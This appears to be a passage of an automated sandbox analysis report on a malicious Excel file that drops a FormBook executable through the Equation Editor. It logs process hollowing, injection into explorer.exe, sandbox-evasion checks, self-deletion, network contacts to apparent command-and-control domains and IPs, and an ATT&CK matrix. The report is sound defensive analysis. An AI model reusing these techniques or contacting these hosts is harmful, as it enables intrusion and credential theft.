          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_0231FC90 NtUnmapViewOfSection,7_2_0231FC90
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_0231FD5C NtEnumerateKey,7_2_0231FD5C
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_02321D80 NtSuspendThread,7_2_02321D80
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_0008A360 NtCreateFile,7_2_0008A360
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_0008A410 NtReadFile,7_2_0008A410
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_0008A490 NtClose,7_2_0008A490
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_0008A540 NtAllocateVirtualMemory,7_2_0008A540
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_0008A40A NtReadFile,7_2_0008A40A
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_0008A45A NtReadFile,7_2_0008A45A
          Source: .vbc[1].exe.2.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: vbc.exe.2.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: C:\Users\Public\vbc.exeMemory allocated: 76F90000 page execute and read and writeJump to behavior
          Source: C:\Users\Public\vbc.exeMemory allocated: 76E90000 page execute and read and writeJump to behavior
          Source: C:\Users\Public\vbc.exeMemory allocated: 76F90000 page execute and read and writeJump to behavior
          Source: C:\Users\Public\vbc.exeMemory allocated: 76E90000 page execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\cscript.exeMemory allocated: 76F90000 page execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\cscript.exeMemory allocated: 76E90000 page execute and read and writeJump to behavior
          Source: New order - C.S.I No. 04183.xlsxVirustotal: Detection: 36%
          Source: New order - C.S.I No. 04183.xlsxReversingLabs: Detection: 36%
          Source: C:\Users\Public\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
          Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"
          Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\cscript.exe C:\Windows\SysWOW64\cscript.exe
          Source: C:\Windows\SysWOW64\cscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\Public\vbc.exe"
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe" Jump to behavior
          Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe" Jump to behavior
          Source: C:\Windows\SysWOW64\cscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\Public\vbc.exe"Jump to behavior
          Source: C:\Users\Public\vbc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32Jump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$New order - C.S.I No. 04183.xlsxJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRCF01.tmpJump to behavior
          Source: classification engineClassification label: mal100.troj.expl.evad.winXLSX@9/24@2/3
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00402012 CoCreateInstance,MultiByteToWideChar,4_2_00402012
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\Public\vbc.exeCode function: 4_2_0040411B GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,4_2_0040411B
          Source: explorer.exe, 00000006.00000000.475414303.0000000002AE0000.00000002.00020000.sdmpBinary or memory string: .VBPud<_
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
          Source: Binary string: wntdll.pdb source: vbc.exe, vbc.exe, 00000005.00000003.459887685.00000000002B0000.00000004.00000001.sdmp, vbc.exe, 00000005.00000002.495263706.00000000008C0000.00000040.00000001.sdmp, vbc.exe, 00000005.00000003.460925066.00000000005B0000.00000004.00000001.sdmp, vbc.exe, 00000005.00000002.495125436.0000000000740000.00000040.00000001.sdmp, cscript.exe, cscript.exe, 00000007.00000003.494990015.00000000004B0000.00000004.00000001.sdmp, cscript.exe, 00000007.00000002.663624666.0000000002490000.00000040.00000001.sdmp, cscript.exe, 00000007.00000002.663448508.0000000002310000.00000040.00000001.sdmp, cscript.exe, 00000007.00000003.495952417.0000000002180000.00000004.00000001.sdmp
          Source: Binary string: cscript.pdbN source: vbc.exe, 00000005.00000002.495021937.00000000004C9000.00000004.00000020.sdmp, vbc.exe, 00000005.00000002.495522303.0000000002360000.00000040.00020000.sdmp
          Source: Binary string: cscript.pdb source: vbc.exe, 00000005.00000002.495021937.00000000004C9000.00000004.00000020.sdmp, vbc.exe, 00000005.00000002.495522303.0000000002360000.00000040.00020000.sdmp
          Source: C:\Users\Public\vbc.exeCode function: 4_2_100118D5 push ecx; ret 4_2_100118E8
          Source: C:\Users\Public\vbc.exeCode function: 4_2_1000DDB7 push edi; iretd 4_2_1000DDB8
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0040E390 push dword ptr [ecx]; retf 5_2_0040E395
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041D4B5 push eax; ret 5_2_0041D508
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00416548 push esi; retf 5_2_0041654C
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041D56C push eax; ret 5_2_0041D572
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041D502 push eax; ret 5_2_0041D508
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041D50B push eax; ret 5_2_0041D572
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00413602 push 0000007Eh; retf 5_2_00413605
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0075DFA1 push ecx; ret 5_2_0075DFB4
          Source: C:\Users\Public\vbc.exeCode function: 5_1_0040E390 push dword ptr [ecx]; retf 5_1_0040E395
          Source: C:\Users\Public\vbc.exeCode function: 5_1_0041D4B5 push eax; ret 5_1_0041D508
          Source: C:\Users\Public\vbc.exeCode function: 5_1_00416548 push esi; retf 5_1_0041654C
          Source: C:\Users\Public\vbc.exeCode function: 5_1_0041D56C push eax; ret 5_1_0041D572
          Source: C:\Users\Public\vbc.exeCode function: 5_1_0041D502 push eax; ret 5_1_0041D508
          Source: C:\Users\Public\vbc.exeCode function: 5_1_0041D50B push eax; ret 5_1_0041D572
          Source: C:\Users\Public\vbc.exeCode function: 5_1_00413602 push 0000007Eh; retf 5_1_00413605
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_0232DFA1 push ecx; ret 7_2_0232DFB4
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_0007E390 push dword ptr [ecx]; retf 7_2_0007E395
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_0008D4B5 push eax; ret 7_2_0008D508
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_0008D50B push eax; ret 7_2_0008D572
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_0008D502 push eax; ret 7_2_0008D508
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_00086548 push esi; retf 7_2_0008654C
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_0008D56C push eax; ret 7_2_0008D572
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_00083602 push 0000007Eh; retf 7_2_00083605
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00405C49 GetModuleHandleA,LoadLibraryA,GetProcAddress,4_2_00405C49
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
          Source: C:\Users\Public\vbc.exeFile created: C:\Users\user\AppData\Local\Temp\nssE7A3.tmp\folvcfp.dllJump to dropped file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.vbc[1].exeJump to dropped file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file

          Boot Survival:

          barindex
          Drops PE files to the user root directoryShow sources
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file

          Hooking and other Techniques for Hiding and Protection:

          barindex
          Modifies the prolog of user mode functions (user mode inline hooks)Show sources
          Source: explorer.exeUser mode code has changed: module: USER32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x81 0x1E 0xEF
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\cscript.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion:

          barindex
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\Public\vbc.exeRDTSC instruction interceptor: First address: 0000000000409904 second address: 000000000040990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\Public\vbc.exeRDTSC instruction interceptor: First address: 0000000000409B7E second address: 0000000000409B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\cscript.exeRDTSC instruction interceptor: First address: 0000000000079904 second address: 000000000007990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\cscript.exeRDTSC instruction interceptor: First address: 0000000000079B7E second address: 0000000000079B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2984Thread sleep time: -120000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\cscript.exe TID: 2092Thread sleep time: -36000s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\cscript.exeLast function: Thread delayed
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00409AB0 rdtsc 5_2_00409AB0
          Source: C:\Users\Public\vbc.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00405250 DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,4_2_00405250
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00405C22 FindFirstFileA,FindClose,4_2_00405C22
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00402630 FindFirstFileA,4_2_00402630
          Source: explorer.exe, 00000006.00000000.485535425.000000000457A000.00000004.00000001.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
          Source: explorer.exe, 00000006.00000000.462632682.0000000000255000.00000004.00000020.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000006.00000000.531903120.000000000460B000.00000004.00000001.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0libr
          Source: explorer.exe, 00000006.00000000.480214467.0000000008402000.00000004.00000001.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000%
          Source: explorer.exe, 00000006.00000000.485535425.000000000457A000.00000004.00000001.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
          Source: vbc.exe, 00000004.00000002.459995878.0000000000264000.00000004.00000020.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
          Source: explorer.exe, 00000006.00000000.531615783.000000000456F000.00000004.00000001.sdmpBinary or memory string: scsi\disk&ven_vmware&prod_virtual_disk\5&22be343f&0&000000
          Source: explorer.exe, 00000006.00000000.485535425.000000000457A000.00000004.00000001.sdmpBinary or memory string: pciide\idechannel\5&12368b4a&0&7ide\cdromnecvmwar_vmware_sata_cd01_______________1.00____\6&373888b8&0&1.0.0acpi\pnp0a05\5cacpi\pnp0a05\25pciide\idech7
          Source: explorer.exe, 00000006.00000000.531546454.00000000044E7000.00000004.00000001.sdmpBinary or memory string: ide\cdromnecvmwar_vmware_sata_cd01_______________1.00____\6&373888b8&0&1.0.0
          Source: explorer.exe, 00000006.00000000.527617599.000000000029B000.00000004.00000020.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0*N
          Source: explorer.exe, 00000006.00000000.531838904.00000000045D6000.00000004.00000001.sdmpBinary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: C:\Users\Public\vbc.exeCode function: 4_2_10013450 EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,4_2_10013450
          Source: C:\Users\Public\vbc.exeCode function: 4_2_10013450 EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,4_2_10013450
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00405C49 GetModuleHandleA,LoadLibraryA,GetProcAddress,4_2_00405C49
          Source: C:\Users\Public\vbc.exeCode function: 4_2_10001000 GetProcessHeap,HeapAlloc,RegCreateKeyExW,GetProcessHeap,HeapFree,4_2_10001000
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00409AB0 rdtsc 5_2_00409AB0
          Source: C:\Users\Public\vbc.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\SysWOW64\cscript.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\Public\vbc.exeCode function: 5_2_007626F8 mov eax, dword ptr fs:[00000030h]5_2_007626F8
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_023326F8 mov eax, dword ptr fs:[00000030h]7_2_023326F8
          Source: C:\Users\Public\vbc.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\cscript.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0040ACF0 LdrLoadDll,5_2_0040ACF0
          Source: C:\Users\Public\vbc.exeCode function: 4_2_1000F001 SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_1000F001

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeNetwork Connect: 104.21.82.75 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.oojry.xyz
          Source: C:\Windows\explorer.exeDomain query: www.crystalsbyzoe.com
          Source: C:\Windows\explorer.exeNetwork Connect: 34.246.239.131 80Jump to behavior
          Sample uses process hollowing techniqueShow sources
          Source: C:\Users\Public\vbc.exeSection unmapped: C:\Windows\SysWOW64\cscript.exe base address: A40000Jump to behavior
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\Public\vbc.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\Public\vbc.exeSection loaded: unknown target: C:\Windows\SysWOW64\cscript.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\Public\vbc.exeSection loaded: unknown target: C:\Windows\SysWOW64\cscript.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\cscript.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\cscript.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Injects a PE file into a foreign processesShow sources
          Source: C:\Users\Public\vbc.exeMemory written: C:\Users\Public\vbc.exe base: 400000 value starts with: 4D5AJump to behavior
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\Public\vbc.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\Public\vbc.exeThread register set: target process: 1764Jump to behavior
          Source: C:\Windows\SysWOW64\cscript.exeThread register set: target process: 1764Jump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe" Jump to behavior
          Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe" Jump to behavior
          Source: C:\Windows\SysWOW64\cscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\Public\vbc.exe"Jump to behavior
          Source: explorer.exe, 00000006.00000000.473759544.0000000000750000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.463194949.0000000000750000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.527835651.0000000000750000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.481911491.0000000000750000.00000002.00020000.sdmp, cscript.exe, 00000007.00000002.662281409.0000000000A70000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000006.00000000.527587119.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.473549463.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.481695686.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.462632682.0000000000255000.00000004.00000020.sdmpBinary or memory string: ProgmanG
          Source: explorer.exe, 00000006.00000000.473759544.0000000000750000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.463194949.0000000000750000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.527835651.0000000000750000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.481911491.0000000000750000.00000002.00020000.sdmp, cscript.exe, 00000007.00000002.662281409.0000000000A70000.00000002.00020000.sdmpBinary or memory string: !Progman
          Source: explorer.exe, 00000006.00000000.473759544.0000000000750000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.463194949.0000000000750000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.527835651.0000000000750000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.481911491.0000000000750000.00000002.00020000.sdmp, cscript.exe, 00000007.00000002.662281409.0000000000A70000.00000002.00020000.sdmpBinary or memory string: Program Manager<
          Source: C:\Users\Public\vbc.exeCode function: 4_2_10011025 cpuid 4_2_10011025
          Source: C:\Users\Public\vbc.exeCode function: 4_2_0040594D GetVersion,GetSystemDirectoryA,GetWindowsDirectoryA,SHGetSpecialFolderLocation,SHGetPathFromIDListA,CoTaskMemFree,lstrcatA,lstrlenA,4_2_0040594D

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.vbc.exe.2980000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.vbc.exe.400000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.vbc.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.vbc.exe.400000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.vbc.exe.2980000.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.1.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.vbc.exe.400000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.1.vbc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000005.00000000.458934235.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.661950337.0000000000070000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.495102913.0000000000700000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.661999463.00000000001A0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.494981815.0000000000430000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.461465178.0000000002980000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.486605317.0000000007EF9000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.494965073.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.479874568.0000000007EF9000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.662048126.00000000002D0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000001.459709526.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.457834492.0000000000400000.00000040.00000001.sdmp, type: MEMORY

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.vbc.exe.2980000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.vbc.exe.400000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.vbc.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.vbc.exe.400000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.vbc.exe.2980000.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.1.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.vbc.exe.400000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.1.vbc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000005.00000000.458934235.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.661950337.0000000000070000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.495102913.0000000000700000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.661999463.00000000001A0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.494981815.0000000000430000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.461465178.0000000002980000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.486605317.0000000007EF9000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.494965073.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.479874568.0000000007EF9000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.662048126.00000000002D0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000001.459709526.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.457834492.0000000000400000.00000040.00000001.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsNative API1Path InterceptionProcess Injection612Rootkit1Credential API Hooking1Security Software Discovery151Remote ServicesCredential API Hooking1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationSystem Shutdown/Reboot1
          Default AccountsShared Modules1Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsMasquerading111LSASS MemoryVirtualization/Sandbox Evasion2Remote Desktop ProtocolArchive Collected Data1Exfiltration Over BluetoothIngress Tool Transfer14Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
